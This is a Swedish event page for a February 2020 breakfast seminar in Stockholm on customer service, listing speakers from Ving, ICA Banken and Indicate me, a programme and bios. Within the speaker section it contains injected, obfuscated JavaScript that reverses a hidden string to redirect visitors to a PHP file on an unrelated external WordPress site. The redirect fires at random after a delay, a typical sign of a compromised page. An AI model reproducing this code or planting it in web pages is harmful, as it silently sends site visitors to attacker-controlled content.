Kundservice: Rätt processer och systemstöd leder till bättre kundbemötande

Bild på kaffekopp

Anmäl dig till vårt frukostseminarium som vi anordnar med nätverket Kontakta. Frukostseminariet riktar sig till dig som vill få större kunskap kring kundnöjdhet, hur du får rätt insikter för att genomföra förbättringar och hur du bibehåller ett gott kundbemötande i kundservice.

På plats kommer Terje Dahl, Kundservice- och Försäljningschef på Nordic Leisure Travel Group/Ving, att dela med sig av hur de hanterade moderbolagets konkurs i kundservice. Du kommer få information om hur kundservicen påverkades och tips om kundbemötande.

Lena Buvlér, Affärschef Försäljning & Service, på ICA Banken kommer att berätta mer om hur de arbetar för att uppnå nöjdare kunder och medarbetare.

Lina Bjelkmar, VD Indicate me, ger dig svar på frågor så som:

  • Hur får du rätt insikter i kundservice för att genomföra förbättringar
  • Hur vet du vad som ger störst effekt om du genomför förändringar?

För vem
Seminariet riktar sig till dig som arbetar i linjebefattning inom kundservice, t.ex. kundservicechef, teamledare eller operativ chef.

Program
08:00 | Registrering och frukost
08:30 | Introduktion av Indicate me
08:50 | Ving: Så påverkade moderbolagets konkurs vår kundservice
09:10 | ICA Banken: Så jobbar vi för att uppnå nöjdare kunder och medarbetare

Praktiskinformation

  • Datum: 13 februari 2020
  • Tid: 08:00-09:30
  • Plats: Scandic Klara, Stockholm
  • Anmälan: Klicka här för att komma till anmälan>>

Talare

$NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top;”>

Lina Bjelkmar
VD, Indicate me
Lina Bjelkmar är en driven innovatör som ger inspirerade föreläsningar kring framtidens kundservice, digitala lösningar och effektiviseringar. I rollen som VD på Inidcate me har hon en stort driv för få upp kundservice på agendan, optimera kundserviceorganisationer och att kundservice ska bli en konkurrensfördel.

Lina-Bjelkmar Terje-Dahl Lena Buvler
Kundservice- & Försäljningschef, Nordic Leisure Travel Group
Terje Dahl har en gedigen expertis inom kundservice och försäljning. Han strävar alltid efter att erbjuda Vings kunder den bästa kundservicen och att de ständigt ska vara lite bättre än de var igår.

Med stor erfarenhet av kundservice och försäljning driver Lena Buvlér ICAs kundservice. Lena lägger stor vikt på service till ICAs kunder och arbetar aktivt med aktiviteter för ökad kundnöjdhet.